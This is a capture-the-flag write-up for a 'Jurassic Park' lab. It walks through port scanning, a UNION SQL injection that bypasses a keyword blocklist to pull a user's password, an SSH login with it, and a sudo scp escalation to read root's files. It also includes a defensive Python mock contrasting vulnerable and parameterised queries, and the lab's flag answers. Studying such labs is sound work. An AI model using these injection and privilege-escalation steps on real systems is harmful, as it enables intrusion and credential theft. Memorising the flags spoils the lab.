Jurassic Park

Port scanning
Starting with a fast port scan to see which ports are open.
root@lab:~/THM/JurassicPark# nmap -T4 -sS -p- jurassic.park
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST
Nmap scan report for jurassic.park (10.10.10.170)
Host is up (0.036s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 20.65 seconds
Then a more targeted scan of the two open ports, with version detection and the default scripts, to get more information.
root@lab:~/THM/JurassicPark# nmap -T4 -sS -sV -sC -p22,80 jurassic.park
Starting Nmap 7.80 ( https://nmap.org ) at 2019-09-30 20:40 CEST
Nmap scan report for jurassic.park (10.10.10.170)
Host is up (0.032s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 9a:fb:a3:13:72:b3:53:59:94:b8:16:02:d1:d2:7e:32 (RSA)
|   256 76:32:44:a0:39:24:97:44:4f:43:7b:01:39:fb:cd:84 (ECDSA)
|_  256 33:7e:04:8e:db:96:06:af:20:90:a2:81:3d:45:db:8f (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Jarassic Park
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.04 seconds
Not much information, apart from the misspelled "Jarassic Park" as the title of the website.
On the main page the misspelled name appears again... maybe it's not a misspelling but a hint at JAR files?
In the source code there is a comment:
<!-- <video src="assets/theme.mp3" autoplay> -->
Directory brute-forcing shows an assets folder and a /delete page.
root@lab:~/THM/JurassicPark# dirsearch -u http://jurassic.park -e php -x 404 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
dirsearch v0.3.8

Extensions: php | HTTP method: get | Threads: 10 | Wordlist size: 207627
Error Log: /opt/tools/dirsearch/logs/errors-19-09-30_20-43-13.log
Target: http://jurassic.park

[20:43:13] Starting:
[20:43:13] 200 -   1KB - /
[20:43:14] 301 -  315B - /assets  ->  http://jurassic.park/assets/
[20:43:33] 200 -   65B - /delete
[20:48:11] 403 -  301B - /server-status

Task Completed
The /delete page is a plain-text note (the typo is in the server's response):
root@lab:~/THM/JurassicPark# curl jurassic.park/delete
New priv esc for Ubunut?? Change MySQL password on main system!
There is also a shop with a parameter in the URI. When replacing the number with a single quote, I get a very nice result.
And at the bottom the text: YOU DIDN’T SAY THE MAGIC WORD! Try SqlMap.. I dare you..
But when entering a double quote I get a better result, namely an SQL error.
Before continuing with the SQLi option, I first want to check out the parameter with normal values.
root@lab:~/THM/JurassicPark# for i in {1..25}; do echo -e "id=$i\n\n" && curl -s http://jurassic.park/item.php?id=$i | grep -A 10 '<body>' && echo -e '\n------------------------------------------------\n'; done
id=1

<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Gold Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $500000</h3></br>
<div class="alert alert-primary" role="alert"><b>4</b> of these packages have been sold in the last hour.</div></br>
<h4>Childen under 5 can attend free of charge and will be eaten for free. This package includes a dinosaur lunch, tour around the park AND a FREE dinosaur egg from a dino of your choice!</h4>
</br><h4>Order yours quick by calling us!</h4>

------------------------------------------------

id=2

<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Bronse Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $250000</h3></br>
<div class="alert alert-primary" role="alert"><b>11</b> of these packages have been sold in the last hour.</div></br>
<h4>Children under 5 can attend free of charge and eat free. This package includes a tour around the park and a dinosaur lunch! Try different dino's and rate the best tasting one!</h4>
</br><h4>Order yours quick by calling us!</h4>

------------------------------------------------

id=3

<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Basic Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $100000</h3></br>
<div class="alert alert-primary" role="alert"><b>27</b> of these packages have been sold in the last hour.</div></br>
<h4>Children under 5 can attend for free and eat free. This package will include a basic tour around the park in the brand new automated cars!</h4>
</br><h4>Order yours quick by calling us!</h4>

------------------------------------------------

id=4

id=5

<body>
<section class='black text-center'>
<a href="/index.php"><img width=300px src="assets/Jurassic-Park-Logo.png"></a></br></br>
<h1>Development Package</h1></br>
</section>
<div class="container text-center">
<h3>Price: $0</h3></br>
<div class="alert alert-primary" role="alert"><b>0</b> of these packages have been sold in the last hour.</div></br>
<h4>Dennis, why have you blocked these characters: ' # DROP - username @ ---- Is this our WAF now?</h4>
</br><h4>Order yours quick by calling us!</h4>

------------------------------------------------

id=6

id=7

id=8
Ids without a package (4, 6, 7, 8) return no body at all, so the grep fails and the separator is not printed. The useful one is id=5: a hidden development entry that lists exactly which characters and words the filter blocks: ' # DROP - username @
OK... so let's recap what we have so far.
There is a parameter which is vulnerable to SQLi, but there are some defensive settings in place. I have a sqlmap run with WAF tamper options going in the background, but it has not found anything viable. So until I can let sqlmap do the dumping of the database, I have to do some manual labour myself.
SQL Injection
#1 What is the SQL database called which is serving the shop information?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,database(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
park Package
The second column of the query is rendered as the package title, so whatever is injected there shows up in the <h1>. The database is called park.
#2 How many columns does the table have?
That follows from the previous command: a UNION with five columns succeeded without an error, so the query selects 5 columns.
#3 What's the system version?
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,version(),3,4,5" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
5.7.25-0ubuntu0.16.04.2 Package
#4 What is dennis’ password?
Because "username" is filtered, I have to guess the table and column names a bit. After a little while I get a password: the table users and the column password are not blocked.
root@lab:~/THM/JurassicPark# curl -s "http://jurassic.park/item.php?id=5%20UNION%20SELECT%201,password,3,4,5%20from%20users" | \grep '<h1>' | cut -d '>' -f2 | cut -d '<' -f 1
ih8dinos Package
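To make the filter bypass concrete, here is an added example (not code from the room or from this writeup) that mocks item.php with an in-memory SQLite database: a string-concatenated query sitting behind the blocklist that the id=5 page reveals, beside an integer-validated, parameterised version. The schema, the table name items, the sample rows and the way titles are rendered are assumptions; the page only confirms a five-column query, a users table with a password column, and the blocked tokens. SQLite stands in for the MySQL 5.7 that version() reported.

```python
import re
import sqlite3

# Tokens the shop's id=5 page says are blocked: ' # DROP - username @
BLOCKED = ["'", "#", "DROP", "-", "username", "@"]

# Constructed sample data; the real schema is unknown, only that a table
# 'users' has a 'password' column and the shop query has five columns.
SCHEMA = """
CREATE TABLE items(id INTEGER, name TEXT, price INTEGER, sold INTEGER, description TEXT);
INSERT INTO items VALUES
  (1, 'Gold',        500000, 4, 'Dinosaur lunch, tour and a free egg'),
  (5, 'Development', 0,      0, 'Dennis, why have you blocked these characters?');
CREATE TABLE users(id INTEGER, username TEXT, password TEXT);
INSERT INTO users VALUES (1, 'dennis', 'ih8dinos');
"""


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    return con


def waf_blocks(value: str) -> bool:
    """Naive case-insensitive substring blocklist, like the one the page describes."""
    lowered = value.lower()
    return any(tok.lower() in lowered for tok in BLOCKED)


def item_titles_vulnerable(con: sqlite3.Connection, id_param: str):
    """The injection point: the id parameter is concatenated straight into SQL.

    Returns the package titles the page would render (assumed: one <h1> per
    row, second column), or None when the blocklist trips
    ("YOU DIDN'T SAY THE MAGIC WORD!").
    """
    if waf_blocks(id_param):
        return None
    sql = f"SELECT id, name, price, sold, description FROM items WHERE id={id_param}"
    return [row[1] for row in con.execute(sql).fetchall()]


def item_titles_safe(con: sqlite3.Connection, id_param: str):
    """Hardened form: strict integer validation plus a bound parameter.

    No blocklist is needed; the value is never parsed as SQL at all.
    """
    if not re.fullmatch(r"[0-9]{1,9}", id_param):
        return None
    sql = "SELECT id, name, price, sold, description FROM items WHERE id=?"
    return [row[1] for row in con.execute(sql, (int(id_param),)).fetchall()]


def demo():
    con = build_db()
    # Mirrors the writeup's payload: no quote, no '-', no '#', no 'username'.
    payload = "5 UNION SELECT 1,password,3,4,5 FROM users"
    leaked = item_titles_vulnerable(con, payload)
    # Naming the blocked column is refused before any SQL runs...
    refused = item_titles_vulnerable(con, "5 UNION SELECT 1,username,3,4,5 FROM users")
    # ...but only the parameterised version refuses the working payload too.
    hardened = item_titles_safe(con, payload)
    return leaked, refused, hardened


if __name__ == "__main__":
    leaked, refused, hardened = demo()
    print("vulnerable:", leaked)   # users.password rides along as a package title
    print("blocklist :", refused)  # None
    print("hardened  :", hardened) # None
```

The point of the two functions side by side: the blocklist only stops payloads that happen to contain one of six tokens, and the working UNION needs none of them, whereas the parameterised query rejects anything that is not a plain integer before the database ever sees it.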
#5 Locate and get the first flag contents.
root@lab:~/THM/JurassicPark# ssh dennis@jurassic.park
The authenticity of host 'jurassic.park (10.10.150.111)' can't be established.
ECDSA key fingerprint is SHA256:/qDcDUmBukzaryWv8jvW3cafeByJkfebR0UcVxD/wVE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'jurassic.park,10.10.150.111' (ECDSA) to the list of known hosts.
dennis@jurassic.park's password:
Welcome to Ubuntu 16.04.5 LTS (GNU/Linux 4.4.0-1072-aws x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

62 packages can be updated.
45 updates are security updates.

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

dennis@ip-10-10-150-111:~$ ls -lah
total 44K
drwxr-xr-x 3 dennis dennis 4.0K Sep 30 20:20 .
drwxr-xr-x 4 root   root   4.0K Feb 16  2019 ..
-rw------- 1 dennis dennis 1001 Feb 16  2019 .bash_history
-rw-r--r-- 1 dennis dennis  220 Feb 16  2019 .bash_logout
-rw-r--r-- 1 dennis dennis 3.7K Feb 16  2019 .bashrc
drwx------ 2 dennis dennis 4.0K Sep 30 20:20 .cache
-rw-rw-r-- 1 dennis dennis   93 Feb 16  2019 flag1.txt
-rw-r--r-- 1 dennis dennis  655 Feb 16  2019 .profile
-rw-rw-r-- 1 dennis dennis   32 Feb 16  2019 test.sh
-rw------- 1 dennis dennis 4.3K Feb 16  2019 .viminfo
dennis@ip-10-10-150-111:~$ cat flag1.txt
Congrats on finding the first flag.. But what about the rest? :O
b89f2d69c56b9981ac92dd267f
#6 What's the contents of the second flag?
dennis@ip-10-10-150-111:~$ find / -iname "flag*" -type f 2>/dev/null
/home/dennis/flag1.txt
/sys/devices/pnp0/00:06/tty/ttyS0/flags
/sys/devices/vif-0/net/eth0/flags
/sys/devices/virtual/net/lo/flags
/sys/devices/platform/serial8250/tty/ttyS1/flags
/sys/devices/platform/serial8250/tty/ttyS2/flags
/sys/devices/platform/serial8250/tty/ttyS3/flags
/usr/src/linux-aws-headers-4.4.0-1072/scripts/coccinelle/locks/flags.cocci
/usr/src/linux-headers-4.4.0-1072-aws/include/config/zone/dma/flag.h
/boot/grub/fonts/flagTwo.txt
dennis@ip-10-10-150-111:~$ cat /boot/grub/fonts/flagTwo.txt
96ccd6b429be8c9a4b501c7a0b117b0a
#7 What's the contents of the third flag?
dennis@ip-10-10-150-111:~$ cat .bash_history
Flag3:b4973bbc9053807856ec815db25fb3f1
#8 What's the contents of the fourth flag?
dennis@ip-10-10-150-111:~$ cat .viminfo > /tmp/flagFour.txt
But there is no /tmp/flagFour.txt. In the Discord chat room the creator of the room confirms this.
#9 What's the contents of the fifth flag?
dennis@ip-10-10-150-111:~$ sudo -l
Matching Defaults entries for dennis on ip-10-10-150-111.eu-west-1.compute.internal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dennis may run the following commands on ip-10-10-150-111.eu-west-1.compute.internal:
    (ALL) NOPASSWD: /usr/bin/scp
dennis@ip-10-10-150-111:~$ ls -ld /usr/bin/scp
-rwxr-xr-x 1 root root 80016 Nov  5  2018 /usr/bin/scp
dennis@ip-10-10-150-111:~$ cat test.sh
#!/bin/bash
cat /root/flag5.txt
dennis@ip-10-10-150-111:~$ sudo scp -r /root/flag5.txt /tmp
dennis@ip-10-10-150-111:~$ ls -lah /tmp
total 40K
drwxrwxrwt  9 root root 4.0K Sep 30 20:25 .
drwxr-xr-x 23 root root 4.0K Sep 30 19:46 ..
-rw-r--r--  1 root root   33 Sep 30 20:25 flag5.txt
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .font-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .ICE-unix
drwx------  3 root root 4.0K Sep 30 19:46 systemd-private-eed490776f0c401db680b0c43a10f612-systemd-timesyncd.service-02qwMJ
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .Test-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .X11-unix
drwxrwxrwt  2 root root 4.0K Sep 30 19:46 .XIM-unix
dennis@ip-10-10-150-111:~$ cat /tmp/flag5.txt
2a7074e491fcacc7eeba97808dc5e2ec
Since sudo runs scp as root, a local-to-local copy reads any file on the box; the flag lands in /tmp owned by root but world-readable, which is all that is needed here. Note that such a NOPASSWD rule is broader than reading files: with the arguments reversed the same command writes as root, and scp's -S option names the program used to open the connection, so in practice the rule amounts to running arbitrary commands as root.